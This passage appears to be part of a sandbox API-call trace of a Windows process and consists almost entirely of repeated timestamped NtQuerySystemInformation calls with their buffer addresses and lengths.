_String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0210.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfed10, Length=0x50, ResultLength=0x0) [0210.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfed10, Length=0x50, ResultLength=0x0) [0210.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfed10, Length=0x50, ResultLength=0x0) [0210.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfec40, Length=0x38, ResultLength=0x0) [0210.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea70, Length=0x28, ResultLength=0x0) [0210.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea70, Length=0x28, ResultLength=0x0) [0210.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea70, Length=0x28, ResultLength=0x0) [0210.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfeae0, Length=0x28, ResultLength=0x0) [0210.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfec40, Length=0x38, ResultLength=0x0) [0210.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfeb60, Length=0x28, ResultLength=0x0) [0210.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfeb60, Length=0x28, ResultLength=0x0) [0210.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfec40, Length=0x38, ResultLength=0x0) [0210.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfeac0, Length=0x20, ResultLength=0x0) [0210.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea40, Length=0x20, ResultLength=0x0) [0210.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea40, Length=0x20, ResultLength=0x0) [0210.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea40, Length=0x20, ResultLength=0x0) [0210.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfec40, Length=0x38, ResultLength=0x0) [0210.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfeac0, Length=0x20, ResultLength=0x0) [0210.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea50, Length=0x20, ResultLength=0x0) [0210.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea50, Length=0x20, ResultLength=0x0) [0210.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dff190, Length=0x48, ResultLength=0x0) [0230.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc40, Length=0x50, ResultLength=0x0) [0263.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc40, Length=0x50, ResultLength=0x0) [0263.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc40, Length=0x50, ResultLength=0x0) [0263.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb30, Length=0x50, ResultLength=0x0) [0263.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb30, Length=0x50, ResultLength=0x0) [0263.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb30, Length=0x50, ResultLength=0x0) [0263.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb30, Length=0x50, ResultLength=0x0) [0263.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda60, Length=0x38, ResultLength=0x0) [0263.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x28, ResultLength=0x0) [0263.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x28, ResultLength=0x0) [0263.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x28, ResultLength=0x0) [0263.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x28, ResultLength=0x0) [0263.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x28, ResultLength=0x0) [0263.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda60, Length=0x38, ResultLength=0x0) [0263.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd980, Length=0x28, ResultLength=0x0) [0263.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd980, Length=0x28, ResultLength=0x0) [0263.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd820, Length=0x20, ResultLength=0x0) [0263.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7a0, Length=0x20, ResultLength=0x0) [0263.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7a0, Length=0x20, ResultLength=0x0) [0263.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7a0, Length=0x20, ResultLength=0x0) [0263.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda60, Length=0x38, ResultLength=0x0) [0263.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda60, Length=0x38, ResultLength=0x0) [0263.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8e0, Length=0x20, ResultLength=0x0) [0263.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd870, Length=0x20, ResultLength=0x0) [0263.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd870, Length=0x20, ResultLength=0x0) [0263.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde90, Length=0x50, ResultLength=0x0) [0263.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde90, Length=0x50, ResultLength=0x0) [0263.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde90, Length=0x50, ResultLength=0x0) [0263.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd80, Length=0x50, ResultLength=0x0) [0263.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd80, Length=0x50, ResultLength=0x0) [0263.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd80, Length=0x50, ResultLength=0x0) [0263.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd80, Length=0x50, ResultLength=0x0) [0263.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcb0, Length=0x38, ResultLength=0x0) [0263.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdae0, Length=0x28, ResultLength=0x0) [0263.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdae0, Length=0x28, ResultLength=0x0) [0263.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdae0, Length=0x28, ResultLength=0x0) [0263.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb50, Length=0x28, ResultLength=0x0) [0263.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcb0, Length=0x38, ResultLength=0x0) [0263.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbd0, Length=0x28, ResultLength=0x0) [0263.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbd0, Length=0x28, ResultLength=0x0) [0263.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcb0, Length=0x38, ResultLength=0x0) [0263.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb30, Length=0x20, ResultLength=0x0) [0263.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdab0, Length=0x20, ResultLength=0x0) [0263.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdab0, Length=0x20, ResultLength=0x0) [0263.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdab0, Length=0x20, ResultLength=0x0) [0263.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcb0, Length=0x38, ResultLength=0x0) [0263.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb30, Length=0x20, ResultLength=0x0) [0263.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x20, ResultLength=0x0) [0263.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x20, ResultLength=0x0) [0263.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde90, Length=0x50, ResultLength=0x0) [0263.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde90, Length=0x50, ResultLength=0x0) [0263.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde90, Length=0x50, ResultLength=0x0) [0263.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd80, Length=0x50, ResultLength=0x0) [0263.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd80, Length=0x50, ResultLength=0x0) [0263.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd80, Length=0x50, ResultLength=0x0) [0263.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd80, Length=0x50, ResultLength=0x0) [0263.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcb0, Length=0x38, ResultLength=0x0) [0263.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdae0, Length=0x28, ResultLength=0x0) [0263.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdae0, Length=0x28, ResultLength=0x0) [0263.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdae0, Length=0x28, ResultLength=0x0) [0263.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb50, Length=0x28, ResultLength=0x0) [0263.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcb0, Length=0x38, ResultLength=0x0) [0263.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbd0, Length=0x28, ResultLength=0x0) [0263.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbd0, Length=0x28, ResultLength=0x0) [0263.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcb0, Length=0x38, ResultLength=0x0) [0263.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb30, Length=0x20, ResultLength=0x0) [0263.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdab0, Length=0x20, ResultLength=0x0) [0263.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdab0, Length=0x20, ResultLength=0x0) [0263.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdab0, Length=0x20, ResultLength=0x0) [0263.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.347] NtQuerySystemInformation (SystemInformationClass=0xb9, 